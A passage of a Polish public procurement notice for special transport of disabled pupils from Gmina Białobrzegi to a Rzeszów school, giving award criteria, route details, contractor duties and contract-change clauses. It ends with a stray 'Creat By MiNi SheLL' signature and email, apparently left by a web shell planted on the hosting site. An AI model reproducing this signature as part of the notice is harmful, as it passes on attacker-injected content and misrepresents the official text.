Wykonawców [brutto]<br/> Cena za daną część badanej oferty [brutto]<br/><br/>Pc – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/><br/>2)	Czas podstawienia zastępczego środka transportu (waga 40%) <br/>– najkrótszy możliwy czas podstawienia zastępczego środka transportu wymagany przez Zamawiającego wynosi 20 minut, a najdłuższy 50 minut <br/>(dot. części numer 1, 2 i 3)<br/><br/>Kryterium – „czas podstawienia zastępczego środka transportu” – poszczególnym ofertom zostaną przyznane punkty za czas podstawienia zastępczego środka transportu w skali 1-20 pkt obliczone według wzoru:<br/> <br/>„Pcz” : najkrótszy czas podstawienia zastępczego środka transportu w danej części<br/> badany czas podstawienia zastępczego środka transportu w danej części <br/> x 40 <br/>Pcz – ilość punktów przyznanych Wykonawcy dla kryterium „czas podstawienia zastępczego środka transportu”<br/><br/>Zamawiający do oceny kryterium „czas podstawienia zastępczego środka transportu” pobierze dane z oferty Wykonawcy.<br/>Jeżeli Wykonawca zaproponuje czas podstawienia krótszy niż 20 minut, do celów obliczenia punktów za to kryterium zostanie przyjęty 20 minutowy czas podstawienia. W przypadku niewpisania żadnego czasu podstawienia zastępczego środka transportu Zamawiający uzna, że czas podstawienia zastępczego środka transportu wynosi 50 min.<br/><br/>a)	Łączna ocena oferty:<br/><br/> P = Pc + Pcz <br/><br/>P – sumaryczna ilość punktów<br/>Pc – ilość punktów przyznanych Wykonawcy w kryterium „cena”<br/>Pcz – ilość punktów przyznanych Wykonawcy w kryterium „czas podstawienia zastępczego środka transportu”<br/><br/>Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.<br/><br/>2. Zamawiający udzieli zamówienia na daną część Wykonawcy, którego oferta zostanie oceniona jako najkorzystniejsza, tzn. uzyska najwyższą liczbę punktów w łącznej ocenie ofert. Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt.<br/>3. Zamawiający zastosuje zaokrąglanie wyników oceny do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia zastępczego środka transportu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część numer 3 – „Dowóz dzieci i uczniów niepełnosprawnych z terenu Gminy Białobrzegi do Zespołu Szkół Specjalnych UNICEF w Rzeszowie w roku szkolnym 2023/2024”<br/><br/>Trasa: Budy Łańcuckie 56 (prawa strona) -Wola Dalsza 563-Zespół Szkół Specjalnych im. UNICEF w Rzeszowie ul. Ofiar Katynia 1 (tam i z powrotem)<br/>Liczba dzieci: 2 osoby <br/>Realizacja zadania polega na przewozie dzieci na trasie: dom – szkoła – dom, pod opieką opiekuna. <br/>Długość trasy tam i z powrotem wynosi : 80 km.<br/><br/>1.	W trakcie realizacji zamówienia liczba przewożonych dzieci niepełnosprawnych oraz ilość kilometrów może ulec zmianie: zmniejszeniu oraz zwiększeniu - Wykonawca powinien uwzględnić ewentualne zwiększenie liczby dzieci o maksymalnie dwie osoby na każdej z części. Zamawiający zobowiązany jest informować Wykonawcę o każdej zmianie z co najmniej 7 - dniowym wyprzedzeniem, jednak cena zaoferowana za jeden dzień jest niezmienna przez cały okres realizacji zadania. <br/>2.	Przed przystąpieniem do realizacji usługi dowozu, Wykonawca ustali szczegółowy harmonogram dni i godzin dowozu z uwzględnieniem założeń, że uczniowie powinni być dowiezieni do szkoły w takim czasie, aby możliwe było punktualne rozpoczęcie przez nich zajęć i zabierani po ich zakończeniu bez zbędnego oczekiwania. Uczniowie objęci dowożeniem są odbierani i przywożeni pod adres zamieszkania. <br/>3.	Wykonawca oświadcza, że działa na podstawie zezwolenia/licencji, posiada uprawnienia oraz odpowiednie środki transportu, a także pracowników posiadających odpowiednie kwalifikacje i uprawnienia do wykonania niniejszej umowy zgodnie z obowiązującymi przepisami prawa. <br/>4.	Wykonawca zobowiązuje się do:<br/>-zapewnienia przewożonym uczniom bezpiecznych i higienicznych warunków podczas przewozu, <br/>-zapewnienia stałej i wykwalifikowanej opieki nad niepełnosprawnymi dziećmi (opiekun musi być osobą pełnoletnią oraz musi posiadać ukończony kurs pierwszej pomocy przedmedycznej) w czasie przewozu uczniów, z zastrzeżeniem, że kierowca nie może być jednocześnie opiekunem, <br/>-zapewnienia bezpieczeństwa przy wsiadaniu i wysiadaniu z pojazdu oraz w pojeździe,<br/>-wykonywania przewozów osobiście lub przez osoby przez niego zatrudnione, posiadające wymagane przepisami prawa uprawnienia i kwalifikacje, <br/>-wykonywania usługi środkiem transportu przystosowanym konstrukcyjnie do przewozu osób niepełnosprawnych, <br/>-punktualnego i terminowego podstawienia pojazdu w wyznaczonym punkcie odbioru ucznia, <br/>-utrzymania pojazdu w należytym stanie technicznym. Pojazd powinien posiadać aktualne ubezpieczenie OC i NW, aktualne badanie techniczne dopuszczające pojazd do ruchu. <br/>5. Podczas wykonywania usługi dowozu Wykonawca zobowiązany jest do stosowania przepisów dotyczących transportu zbiorowego uczniów niepełnosprawnych. <br/>6. Wykonawca nie ponosi odpowiedzialności za opóźnienie przewozy na skutek sytuacji nieprzewidzianych (intensywne opady śniegu, zawieje, powódź itp.)<br/>7. Strony zobowiązują się wzajemnie powiadomić o zaistniałych przeszkodach w wypełnianiu zobowiązań umownych w trakcie realizacji usługi. <br/>8. W razie niemożności wykonywania przewozu z przyczyn leżących po stronie Wykonawcy, Wykonawca zobowiązuje się do zapewnienia transportu zastępczego o takich samych parametrach. <br/>9. Wykonawca ponosi wyłączną odpowiedzialność wobec osób trzecich za szkody powstałe w związku z realizacją umowy. <br/>10. Dzieci niepełnosprawne zostają odbierane i przywożone pod adres zamieszkania. Dokładne adresy i wykaz dzieci objętych dowozem Zamawiający przekaże Wykonawcy, który zostanie wyłoniony w wyniku niniejszego postępowania przy podpisaniu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie wg następujących kryteriów oceny ofert: <br/>1) Cena oferty za przedmiot zamówienia (waga 60%)<br/>(dotyczy części numer 1,2 i 3)<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali <br/>1-60 obliczone według wzoru:<br/><br/>„Pc”: Najniższa cena na daną część z oferowanych przez Wykonawców [brutto]<br/> Cena za daną część badanej oferty [brutto]<br/><br/>Pc – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/><br/>2)	Czas podstawienia zastępczego środka transportu (waga 40%) <br/>– najkrótszy możliwy czas podstawienia zastępczego środka transportu wymagany przez Zamawiającego wynosi 20 minut, a najdłuższy 50 minut <br/>(dot. części numer 1, 2 i 3)<br/><br/>Kryterium – „czas podstawienia zastępczego środka transportu” – poszczególnym ofertom zostaną przyznane punkty za czas podstawienia zastępczego środka transportu w skali 1-20 pkt obliczone według wzoru:<br/> <br/>„Pcz” : najkrótszy czas podstawienia zastępczego środka transportu w danej części<br/> badany czas podstawienia zastępczego środka transportu w danej części <br/> x 40 <br/>Pcz – ilość punktów przyznanych Wykonawcy dla kryterium „czas podstawienia zastępczego środka transportu”<br/><br/>Zamawiający do oceny kryterium „czas podstawienia zastępczego środka transportu” pobierze dane z oferty Wykonawcy.<br/>Jeżeli Wykonawca zaproponuje czas podstawienia krótszy niż 20 minut, do celów obliczenia punktów za to kryterium zostanie przyjęty 20 minutowy czas podstawienia. W przypadku niewpisania żadnego czasu podstawienia zastępczego środka transportu Zamawiający uzna, że czas podstawienia zastępczego środka transportu wynosi 50 min.<br/><br/>a)	Łączna ocena oferty:<br/><br/> P = Pc + Pcz <br/><br/>P – sumaryczna ilość punktów<br/>Pc – ilość punktów przyznanych Wykonawcy w kryterium „cena”<br/>Pcz – ilość punktów przyznanych Wykonawcy w kryterium „czas podstawienia zastępczego środka transportu”<br/><br/>Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.<br/><br/>2. Zamawiający udzieli zamówienia na daną część Wykonawcy, którego oferta zostanie oceniona jako najkorzystniejsza, tzn. uzyska najwyższą liczbę punktów w łącznej ocenie ofert. Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt.<br/>3. Zamawiający zastosuje zaokrąglanie wyników oceny do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia zastępczego środka transportu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz wszystkich załączników, których wymaga się od Wykonawcy został zawarty w pkt. XXV SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w pkt 1.<br/>3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o nie podleganiu wykluczeniu składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>4) Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia. Pełnomocnictwo lub inny dokument ustanawiający pełnomocnika winno być załączone do oferty.<br/>Pełnomocnictwo winno:<br/>a) określać do jakiego postępowania ma zastosowanie,<br/>b) wskazywać pełnomocnika oraz zakres jego umocowania,<br/>c) zawierać nazwę z określeniem adresu i siedziby wszystkich Wykonawców ubiegających się wspólnie o udzielenie niniejszego zamówienia.<br/>5) Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6) Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze.<br/>7) Pełnomocnik pozostaje w kontakcie z Zamawiającym, w toku postępowania zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp.<br/>8) Wspólnicy spółki cywilnej/uczestnicy konsorcjum są traktowani jak Wykonawcy składający ofertę wspólną.<br/>9) Przed podpisaniem umowy (w przypadku wyboru oferty wspólnej jako najkorzystniejszej) Wykonawcy składający ofertę wspólną mają obowiązek przedstawić Zamawiającemu umowę konsorcjum/umowę spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> I.<br/>1. Na podstawie art. 455 ust. 1 pkt 1 uPzp Zamawiający dopuszcza możliwość zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia jeżeli zmiana ta będzie spowodowana okolicznościami niezależnymi od Zamawiającego, tj. np. zmianą miejsca zamieszkania uczniów lub długotrwałą chorobą uczniów, albo innymi okolicznościami, które skutkować będą rezygnacją z dowozu uczniów.<br/>2. Zmiany umowy wymagają zgody obydwu stron i formy pisemnej w postaci aneksu pod rygorem nieważności.<br/>3. Warunkiem wprowadzenia zmiany na wniosek Wykonawcy jest złożenie pisemnego wniosku o zmianę umowy (zawarcie aneksu). Wykonawca zobowiązany jest wykazać zaistnienie okoliczności, z których wynikać będzie konieczność zmiany umowy.<br/>4. Podpisanie aneksu wprowadzającego zmiany umowy powinno być poprzedzone, pod rygorem nieważności, sporządzeniem protokołu konieczności zawierającego uzasadnienie.<br/>5. Niezależnie od postanowień umowy, umowa może ulec zmianie w okolicznościach wynikających z ustawy Pzp.<br/>II.<br/>1. Zmiana wysokości wynagrodzenia należnego Wykonawcy może nastąpić w przypadku zmiany:<br/>1) stawki podatku od towarów i usług,<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r.<br/>o minimalnym wynagrodzeniu za pracę,<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>2. Obowiązek wykazania wpływu zmian, o których mowa w ust. 1 pkt 1) - 4) na koszty wykonania zamówienia należy do Wykonawcy pod rygorem odmowy dokonania zmiany umowy przez Zamawiającego, na zasadach wskazanych poniżej. Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia złożenia wniosku.<br/>III.<br/>1. Wynagrodzenie Wykonawcy, na zasadach określonych w umowie oraz w treści art. 439 uPzp, może podlegać waloryzacji prowadzącej do dokonania zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany ceny dających się wyodrębnić i ustalić kosztów związanych z realizacją zamówienia. Waloryzacja ta może być dokonana po 6 miesiącach trwania umowy z zachowaniem następujących zasad i w następujący sposób:<br/>1) waloryzacja wynagrodzenia następuje po 6 miesiącach trwania umowy,<br/>2) waloryzacja dokonywana będzie w okresie roku, w których może następować zmiana wynagrodzenia Wykonawcy,<br/>3) poziom zmiany ceny kosztów, uprawniający strony umowy do żądania zmiany wynagrodzenia (tj.: średnioroczny wskaźnik cen paliwa) nie może być mniejszy niż 20%,<br/>4) stosowany przez strony umowy sposób określenia wpływu zmiany ceny kosztów na koszt wykonania zamówienia określa się jako waloryzację wynagrodzenia,<br/>5) waloryzacja dokonywana będzie w oparciu o ogłaszany w komunikacie przez Prezesa Głównego Urzędu Statystycznego średnioroczny wskaźnik cen towarów i usług konsumpcyjnych w ujęciu rocznym za rok 2023.<br/>6)waloryzacji, w okresach nie częstszych niż okresy półroczne określone powyżej w punkcie 2, podlega pozostała do wypłaty część Wynagrodzenia należnego Wykonawcy tj. część wynagrodzenia należna za prace i roboty wykonane w kolejnym okresie, w którym waloryzacja następuje,<br/>cd. w zakresie rodzaju i zakresu zmian umowy oraz warunków ich wprowadzenia znajduje się w informacjach dodatkowych ogłoszenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki &#34;Oferty/Wnioski&#34; widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy na Platformie e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-07 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. w zakresie rodzaju i zakresu zmian umowy oraz warunków ich wprowadzenia:<br/>7) waloryzacja wynagrodzenia określonego w § 4 umowy może nastąpić pod warunkiem, że zmiana cen związanych z realizacją zamówienia ma rzeczywisty wpływ na koszt wykonania niniejszej Umowy,<br/>8) maksymalna wysokość zmiany wynagrodzenia określonego w § 4 niniejszej umowy jaką dopuszcza Zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian w wysokości wynagrodzenia wynikających z dokonywania waloryzacji nie może przekroczyć 3% wynagrodzenia określonego w § 4 umowy z chwili jej zawarcia.<br/>2. W sytuacji wystąpienia okoliczności uprawniających do zmiany wynagrodzenia, strony nawzajem są względem siebie uprawnione do złożenia pisemnego wniosku o zmianę Umowy w zakresie płatności dotyczących okresu, za który waloryzacja ma nastąpić. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i wskazanie odpowiedniego wskaźnika GUS, będącego podstawą takiego żądania wraz z potwierdzeniem, że nastąpiła jego zmiana uzasadniająca żądanie. Ponadto wraz z wnioskiem należy podać dokładne wyliczenie kwoty wynagrodzenia po zmianie Umowy, w szczególności należy wykazać związek pomiędzy wnioskowaną kwotą zmiany wynagrodzenia, a wpływem zmiany kosztów realizacji umowy na kalkulację wynagrodzenia. Ponadto w przypadku żądania podwyższenia wynagrodzenia należy również przedstawić dowody ich poniesienia w zwiększonej wysokości.<br/>3. Zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej w postaci aneksu pod rygorem nieważności.<br/>4. Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z ust. 1 i ust. 2, w terminie 30 dni od daty zawarcia z Zamawiającym aneksu, o którym mowa w ust. 2, zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł on umowę, w zakresie odpowiadającym zmianom kosztów dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są warunki określone w art. 439 ust. 5 uPzp, tj. przedmiotem umowy są roboty budowlane, dostawy lub usługi oraz okres obowiązywania umowy przekracza 6 miesięcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com